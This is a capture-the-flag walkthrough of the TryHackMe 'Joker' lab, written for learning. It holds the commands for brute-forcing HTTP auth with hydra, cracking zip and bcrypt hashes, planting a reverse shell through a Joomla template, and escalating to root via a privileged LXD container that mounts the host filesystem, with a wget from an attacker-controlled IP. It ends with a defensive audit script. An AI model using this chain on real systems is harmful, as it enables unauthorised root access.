
Write Up

HA Joker CTF

TryHackMe Medium 450 pts Linux Room

Enumeration with Nmap

Initial reconnaissance, checking service versions on open ports:

nmap -v -sC -sV -oA nmap 10.10.173.35

Apache 2.4.29 is identified, with port 80 serving HTTP content.

Searching Directories

Directory enumeration reveals a hidden file, /secret.txt, and gobuster surfaces /phpinfo.php:

gobuster dir -u http://10.10.173.35/ -w /usr/share/wordlists/dirb/common.txt

The /secret.txt file contains a conversation between Joker and Batman, suggesting the username joker.

Unauthorized HTTP Port

An additional port requiring authentication is identified from the nmap scan: port 8080.

Brute Force Authentication

hydra -l joker -P /usr/share/wordlists/rockyou.txt -s 8080 10.10.173.35 http-get/

The password recovered is hannah.

Directory Enumeration on Port 8080

gobuster dir -U joker -P hannah -u http://10.10.173.35:8080/ -w /usr/share/wordlists/dirb/common.txt -t 20

This reveals /administrator/. Deeper enumeration with nikto surfaces /backup.zip:

nikto -h http://10.10.173.35:8080/ -id joker:hannah

Cracking the Password-Protected Archive

zip2john backup.zip > joker.hash
sudo john joker.hash

The archive password is hannah. The extracted joombadb.sql reveals a "super duper user" entry: admin.

Cracking the Password Hash

echo '$2y$10$b43UqoH5UpXokj2y9e/8U.LD8T3jEQCuxG2oHzALoJaj9M5unOcbG' > pass.txt
sudo john pass.txt          # crack the bcrypt hash first
sudo john pass.txt --show   # --show only prints hashes john has already cracked

The password is abcd1234.

Obtaining a Shell

Log into the administrator panel and abuse the template editor to plant a reverse shell. The Beez3 template is editable and executes PHP code when previewed. After placing the payload and starting a listener:

nc -lvnp [PORT]

A connection is established as www-data.

Privilege Escalation via LXD

Checking groups shows the user belongs to the lxd group:

id

Upgrade to an interactive shell:

python3 -c 'import pty; pty.spawn("/bin/bash");'

On the target, initialize LXD with a directory storage backend. On the attacking machine, build an Alpine image to import:

lxd init

git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine

Serve the built image and download it to the target:

sudo python3 -m http.server 80

cd /tmp
wget http://[YOUR_IP]:80/alpine-v3.12-x86_64-20200923_0009.tar.gz

Import and configure a privileged container mounting the host filesystem:

lxc image import ./alpine-v3.12-x86_64-20200923_0009.tar.gz --alias myimage
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh

Root access achieved — the final flag lives at final.txt.
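The chain above works because lxd group membership is effectively root on the host. The following audit helper, added here and not part of the original write-up, flags two things a defender should check on any LXD host: accounts in the lxd group (parsed from /etc/group) and containers that are both privileged and mount the host root, as the ignite container does. The /etc/group and lxc config contents are constructed samples, not captured from the room.

```python
"""Audit helper: flag lxd-group members and privileged containers mounting host /."""
import re

# Constructed sample of /etc/group (not taken from the target machine).
SAMPLE_GROUP = """root:x:0:
sudo:x:27:
lxd:x:108:www-data,joker
users:x:100:
"""

# Constructed sample of `lxc config show --expanded <container>` output.
SAMPLE_LXC_CONFIG = """config:
  security.privileged: "true"
devices:
  mydevice:
    path: /mnt/root
    recursive: "true"
    source: /
    type: disk
"""


def group_members(group_text, groups=("lxd",)):
    """Return {group: [members]} for groups whose members can reach host root.

    /etc/group lines are name:password:gid:member,member; a non-empty fourth
    field lists the supplementary members, which is what we care about.
    """
    found = {}
    for line in group_text.splitlines():
        parts = line.split(":")
        if len(parts) == 4 and parts[0] in groups and parts[3]:
            found[parts[0]] = parts[3].split(",")
    return found


def risky_container(config_text):
    """True when a container is privileged AND has a disk device rooted at /."""
    privileged = re.search(r'security\.privileged:\s*"?true"?', config_text) is not None
    mounts_root = re.search(r"^\s+source:\s*/\s*$", config_text, re.M) is not None
    return privileged and mounts_root


if __name__ == "__main__":
    print("lxd-equivalent group members:", group_members(SAMPLE_GROUP))
    print("container mounts host root as privileged:", risky_container(SAMPLE_LXC_CONFIG))
```

Run it against the real files with `open("/etc/group").read()` and the output of `lxc config show --expanded <name>`; any member listed, or any True result, is a root-equivalent account or container to remediate.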